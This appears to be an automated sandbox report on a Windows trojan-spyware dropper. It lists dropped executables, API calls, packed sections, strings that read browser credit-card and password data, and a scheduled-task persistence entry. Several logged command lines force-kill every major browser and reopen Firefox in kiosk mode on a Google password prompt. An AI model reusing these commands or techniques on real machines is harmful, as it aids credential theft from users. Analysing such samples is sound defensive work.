Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50065 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:50067 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:50068 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:50070 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:50072 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:50075 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:50078 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:50080 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:50083 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50098 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50099 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50103 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50123 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50128 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50130 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50131 version: TLS 1.2
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FDEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 12_2_00FDEAFF
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FDED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 12_2_00FDED6A
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FCAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput, 12_2_00FCAA57
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FF9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 12_2_00FF9576

System Summary

Source: d7c50276ff.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: d7c50276ff.exe, 0000000C.00000000.2619556994.0000000001022000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_a1304f50-6
Source: d7c50276ff.exe, 0000000C.00000000.2619556994.0000000001022000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_886619fe-a
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: OLR88CERN7VQFRQ38J.exe.0.dr Static PE information: section name:
Source: OLR88CERN7VQFRQ38J.exe.0.dr Static PE information: section name: .idata
Source: OLR88CERN7VQFRQ38J.exe.0.dr Static PE information: section name:
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe.0.dr Static PE information: section name:
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe.0.dr Static PE information: section name: .rsrc
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe.0.dr Static PE information: section name: .idata
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe.0.dr Static PE information: section name:
Source: BF3BS0M5707K28RGW9.exe.0.dr Static PE information: section name:
Source: BF3BS0M5707K28RGW9.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: .idata
Source: skotes.exe.3.dr Static PE information: section name:
Source: random[1].exe.5.dr Static PE information: section name:
Source: random[1].exe.5.dr Static PE information: section name: .rsrc
Source: random[1].exe.5.dr Static PE information: section name: .idata
Source: aae25c676b.exe.5.dr Static PE information: section name:
Source: aae25c676b.exe.5.dr Static PE information: section name: .rsrc
Source: aae25c676b.exe.5.dr Static PE information: section name: .idata
Source: random[1].exe0.5.dr Static PE information: section name:
Source: random[1].exe0.5.dr Static PE information: section name: .rsrc
Source: random[1].exe0.5.dr Static PE information: section name: .idata
Source: random[1].exe0.5.dr Static PE information: section name:
Source: 7d61336cf8.exe.5.dr Static PE information: section name:
Source: 7d61336cf8.exe.5.dr Static PE information: section name: .rsrc
Source: 7d61336cf8.exe.5.dr Static PE information: section name: .idata
Source: 7d61336cf8.exe.5.dr Static PE information: section name:
Source: num[1].exe.5.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: num.exe.5.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FCD5EB: CreateFileW,DeviceIoControl,CloseHandle, 12_2_00FCD5EB
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FC1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 12_2_00FC1201
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FCE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 12_2_00FCE8F6
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe File created: C:\Windows\Tasks\skotes.job
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01012E99 0_3_01012E99
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010138C9 0_3_010138C9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01013EE2 0_3_01013EE2
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Code function: 6_2_00A3DB7F 6_2_00A3DB7F
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Code function: 6_2_00BD3E9B 6_2_00BD3E9B
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Code function: 6_2_00BD3EFB 6_2_00BD3EFB
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 9_2_00E40228 9_2_00E40228
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 9_2_00E7A0D0 9_2_00E7A0D0
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 9_2_00E6E8A0 9_2_00E6E8A0
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 9_2_00E3A850 9_2_00E3A850
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 9_2_00E42030 9_2_00E42030
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 9_2_00E3E1A0 9_2_00E3E1A0
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 9_2_00E35160 9_2_00E35160
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 9_2_00E74A40 9_2_00E74A40
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 9_2_00E3A300 9_2_00E3A300
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 9_2_00E5CCD0 9_2_00E5CCD0
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 9_2_00E37CA4 9_2_00E37CA4
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 9_2_00E44487 9_2_00E44487
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 9_2_00E4049B 9_2_00E4049B
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 9_2_00E5C470 9_2_00E5C470
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 9_2_00E4C5F0 9_2_00E4C5F0
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 9_2_00E335B0 9_2_00E335B0
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 9_2_00E38590 9_2_00E38590
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 9_2_00E5FD10 9_2_00E5FD10
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 9_2_00E3BEB0 9_2_00E3BEB0
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 9_2_00E46EBF 9_2_00E46EBF
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: 9_2_00E3AF10 9_2_00E3AF10
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F68060 12_2_00F68060
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FD2046 12_2_00FD2046
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FC8298 12_2_00FC8298
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F9E4FF 12_2_00F9E4FF
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F9676B 12_2_00F9676B
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FF4873 12_2_00FF4873
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F6CAF0 12_2_00F6CAF0
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F8CAA0 12_2_00F8CAA0
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F7CC39 12_2_00F7CC39
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F96DD9 12_2_00F96DD9
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F691C0 12_2_00F691C0
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F7B119 12_2_00F7B119
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F81394 12_2_00F81394
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F8781B 12_2_00F8781B
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F7997D 12_2_00F7997D
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F67920 12_2_00F67920
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F87A4A 12_2_00F87A4A
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FB3CE7 12_2_00FB3CE7
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F87CA7 12_2_00F87CA7
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F99EEE 12_2_00F99EEE
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FEBE44 12_2_00FEBE44
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\num[1].exe 27E4A3627D7DF2B22189DD4BEBC559AE1986D49A8F4E35980B428FADB66CF23D
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: String function: 00F7F9F2 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: String function: 00F69CB3 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: String function: 00F80A30 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Code function: String function: 00E4D300 appears 47 times
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9994907693894389
Source: OLR88CERN7VQFRQ38J.exe.0.dr Static PE information: Section: ZLIB complexity 0.9982597496594006
Source: OLR88CERN7VQFRQ38J.exe.0.dr Static PE information: Section: toioyzgt ZLIB complexity 0.9943542843341261
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe.0.dr Static PE information: Section: iadgvtjq ZLIB complexity 0.9950858969713152
Source: skotes.exe.3.dr Static PE information: Section: ZLIB complexity 0.9982597496594006
Source: skotes.exe.3.dr Static PE information: Section: toioyzgt ZLIB complexity 0.9943542843341261
Source: random[1].exe.5.dr Static PE information: Section: ZLIB complexity 0.9994907693894389
Source: aae25c676b.exe.5.dr Static PE information: Section: ZLIB complexity 0.9994907693894389
Source: random[1].exe0.5.dr Static PE information: Section: iadgvtjq ZLIB complexity 0.9950858969713152
Source: 7d61336cf8.exe.5.dr Static PE information: Section: iadgvtjq ZLIB complexity 0.9950858969713152
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe, 00000004.00000003.2404591407.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, ENORVNMU067PBMHUGECCERYC06W3ZY.exe, 00000004.00000002.2492114993.00000000004D1000.00000040.00000001.01000000.00000009.sdmp, 7d61336cf8.exe, 0000000A.00000003.2591227334.00000000053C0000.00000004.00001000.00020000.00000000.sdmp, 7d61336cf8.exe, 0000000A.00000002.2634884064.0000000000A21000.00000040.00000001.01000000.00000010.sdmp Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@72/24@92/12
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FD37B5 GetLastError,FormatMessageW, 12_2_00FD37B5
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FC10BF AdjustTokenPrivileges,CloseHandle, 12_2_00FC10BF
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FC16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 12_2_00FC16C3
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FD51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 12_2_00FD51CD
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FCD4DC CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 12_2_00FCD4DC
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FD648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize, 12_2_00FD648E
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F642A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 12_2_00F642A2
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Code function: 6_2_053215D0 ChangeServiceConfigA, 6_2_053215D0
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\L7HXZM5O.htm
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1220:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5576:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:352:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5984:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6920:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3876:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5836:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:592:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5072:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7148:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe, 00000004.00000002.2493072660.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards;#
Source: file.exe, 00000000.00000003.2190951633.00000000055D2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2202725554.00000000055D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2191335094.00000000055B4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2202863255.00000000055C4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2191554047.00000000055A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: firefox.exe, 0000001A.00000003.2782230849.000002EE653CD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2936846123.000002EE653CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: UPDATE moz_places SET foreign_count = foreign_count + 1 WHERE id = NEW.place_id;
Source: file.exe ReversingLabs: Detection: 39%
Source: OLR88CERN7VQFRQ38J.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: BF3BS0M5707K28RGW9.exe String found in binary or memory: 3The file %s is missing. Please, re-install this application
Source: 7d61336cf8.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe "C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe "C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe"
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe "C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe "C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe "C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe "C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe"
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe "C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe"
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000995001\num.exe "C:\Users\user\AppData\Local\Temp\1000995001\num.exe"
